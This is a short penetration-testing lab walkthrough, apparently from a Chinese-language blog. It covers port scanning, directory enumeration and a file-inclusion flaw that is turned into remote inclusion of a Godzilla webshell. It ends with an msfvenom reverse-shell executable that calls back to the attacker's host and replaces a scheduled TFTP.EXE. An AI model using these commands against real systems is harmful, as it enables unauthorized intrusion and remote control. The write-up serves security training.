Recon:

1
nmap 192.168.196.53 -p- -Pn --min-rate 2000 -sT -n

![image-20240706195058310]https://anneballa.github.io/pageimgs/oldimage/image-20240706195058310.png)

1
nmap 192.168.196.53 -p21,135,139,445,3306,4443,5040,7680,8080 -sC -sV

![image-20240706200131088]https://anneballa.github.io/pageimgs/oldimage/image-20240706200131088.png)

GetFlag:

枚举目录:

1
dirsearch -u http://192.168.196.53:8080

![image-20240706200908729]https://anneballa.github.io/pageimgs/oldimage/image-20240706200908729.png)

URL中有疑似文件包含的参数:

1
http://192.168.196.53:8080/site/index.php?page=C:/windows/system32/drivers/etc/hosts

![image-20240706201934768]https://anneballa.github.io/pageimgs/oldimage/image-20240706201934768.png)

尝试远程包含:

![image-20240707020412421]https://anneballa.github.io/pageimgs/oldimage/image-20240707020412421.png)

1
http://192.168.236.53:8080/site/index.php?page=http://192.168.45.228/test.php

![image-20240707020436430]https://anneballa.github.io/pageimgs/oldimage/image-20240707020436430.png)

使用Godzilla Webshell:

1
http://192.168.236.53:8080/site/index.php?page=http://192.168.45.228/godzilla.php

在C盘backup下发现info.txt:

![image-20240707021356062]https://anneballa.github.io/pageimgs/oldimage/image-20240707021356062.png)

文本中说明每五分钟会执行TFTP.EXE,且当前用户对TFTP.EXE有写入权限,将其直接替换为二进制文件即可:

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=443 -f exe -o TFTP.EXE

![image-20240707021648549]https://anneballa.github.io/pageimgs/oldimage/image-20240707021648549.png)

通过Godzilla Webshell将TFTP.EXE文件进行替换,等五分钟后即可:

![image-20240707022223403]https://anneballa.github.io/pageimgs/oldimage/image-20240707022223403.png)